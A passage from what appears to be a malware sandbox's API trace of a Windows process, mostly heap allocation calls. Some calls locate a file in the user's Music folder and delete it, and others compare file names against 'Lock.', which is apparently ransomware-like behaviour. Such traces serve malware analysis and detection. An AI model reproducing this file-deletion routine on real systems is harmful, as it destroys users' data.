hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0252.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0252.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.907] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0252.908] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0252.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.908] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0252.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0252.910] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Rk60-o366.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Rk60-o366.m4a", lpFilePart=0x8bedfc*="Rk60-o366.m4a") returned 0x31 [0252.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0252.910] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Rk60-o366.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rk60-o366.m4a")) returned 0x20 [0252.910] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Rk60-o366.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaa18e10, ftCreationTime.dwHighDateTime=0x1d4cab5, ftLastAccessTime.dwLowDateTime=0xcece11b0, ftLastAccessTime.dwHighDateTime=0x1d4d08b, ftLastWriteTime.dwLowDateTime=0xcece11b0, ftLastWriteTime.dwHighDateTime=0x1d4d08b, nFileSizeHigh=0x0, nFileSizeLow=0x14980, dwReserved0=0x1377, dwReserved1=0x4, cFileName="Rk60-o366.m4a", cAlternateFileName="RK60-O~1.M4A")) returned 0xaa5660 [0252.910] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Rk60-o366.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rk60-o366.m4a")) returned 1 [0252.911] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaa18e10, ftCreationTime.dwHighDateTime=0x1d4cab5, ftLastAccessTime.dwLowDateTime=0xcece11b0, ftLastAccessTime.dwHighDateTime=0x1d4d08b, ftLastWriteTime.dwLowDateTime=0xcece11b0, ftLastWriteTime.dwHighDateTime=0x1d4d08b, nFileSizeHigh=0x0, nFileSizeLow=0x14980, dwReserved0=0x1377, dwReserved1=0x4, cFileName="Rk60-o366.m4a", cAlternateFileName="RK60-O~1.M4A")) returned 0 [0252.911] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0252.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.912] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0252.912] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0252.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0252.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.913] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0252.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0252.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0252.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0252.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0252.915] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Rk60-o366.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Rk60-o366.m4a", lpFilePart=0x8bf658*="Rk60-o366.m4a") returned 0x31 [0252.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0252.915] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Rk60-o366.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rk60-o366.m4a")) returned 0xffffffff [0252.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.916] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0252.916] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.916] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0252.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0252.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0252.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0252.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SI3T x_6.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I3T x_6.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3T x_6.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T x_6.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" x_6.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x_6.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_6.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.918] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0252.918] CompareStringW (Locale=0x400, 